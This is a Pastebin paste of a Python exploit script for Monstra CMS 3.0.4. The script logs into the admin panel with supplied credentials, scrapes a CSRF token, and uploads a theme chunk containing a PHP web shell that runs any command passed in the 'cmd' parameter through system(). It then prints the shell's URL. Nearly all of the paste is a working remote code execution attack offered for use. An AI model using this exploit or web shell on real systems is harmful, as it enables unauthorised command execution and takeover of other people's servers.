API tools faq
paste
FlyFar

Monstra CMS 3.0.4 - Remote Code Execution (RCE)

FlyFar
Jun 24th, 2024
67
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.99 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. # Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (RCE)
  2. # Date: 05.05.2024
  3. # Exploit Author: Ahmet Ümit BAYRAM
  4. # Vendor Homepage: https://monstra.org/
  5. # Software Link: https://monstra.org/monstra-3.0.4.zip
  6. # Version: 3.0.4
  7. # Tested on: MacOS
  8.  
  9. import requests
  10. import random
  11. import string
  12. import time
  13. import re
  14. import sys
  15.  
  16. if len(sys.argv) < 4:
  17. print("Usage: python3 script.py <url> <username> <password>")
  18. sys.exit(1)
  19.  
  20. base_url = sys.argv[1]
  21. username = sys.argv[2]
  22. password = sys.argv[3]
  23.  
  24. session = requests.Session()
  25.  
  26. login_url = f'{base_url}/admin/index.php?id=dashboard'
  27. login_data = {
  28. 'login': username,
  29. 'password': password,
  30. 'login_submit': 'Log+In'
  31. }
  32.  
  33. filename = ''.join(random.choices(string.ascii_lowercase + string.digits, k=
  34. 5))
  35.  
  36. print("Logging in...")
  37. response = session.post(login_url, data=login_data)
  38.  
  39. if 'Dashboard' in response.text:
  40. print("Login successful")
  41. else:
  42. print("Login failed")
  43. exit()
  44.  
  45. time.sleep(3)
  46.  
  47. edit_url = f'{base_url}/admin/index.php?id=themes&action=add_chunk'
  48. response = session.get(edit_url) # CSRF token bulmak için edit sayfasına
  49. erişim
  50.  
  51. token_search = re.search(r'input type="hidden" id="csrf" name="csrf" value="
  52. (.*?)"', response.text)
  53. if token_search:
  54. token = token_search.group(1)
  55. else:
  56. print("CSRF token could not be found.")
  57. exit()
  58.  
  59. content = '''
  60. <html>
  61. <body>
  62. <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
  63. <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
  64. <input type="SUBMIT" value="Execute">
  65. </form>
  66. <pre>
  67. <?php
  68. if(isset($_GET['cmd']))
  69. {
  70. system($_GET['cmd']);
  71. }
  72. ?>
  73. </pre>
  74. </body>
  75. </html>
  76. '''
  77.  
  78. edit_data = {
  79. 'csrf': token,
  80. 'name': filename,
  81. 'content': content,
  82. 'add_file': 'Save'
  83. }
  84.  
  85. print("Preparing shell...")
  86. response = session.post(edit_url, data=edit_data)
  87. time.sleep(3)
  88.  
  89. if response.status_code == 200:
  90. print(f"Your shell is ready: {base_url}/public/themes/default/{filename}
  91. .chunk.php")
  92. else:
  93. print("Failed to prepare shell.")
  94.            
Tags: Exploit CVE Vulnerability RCE
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!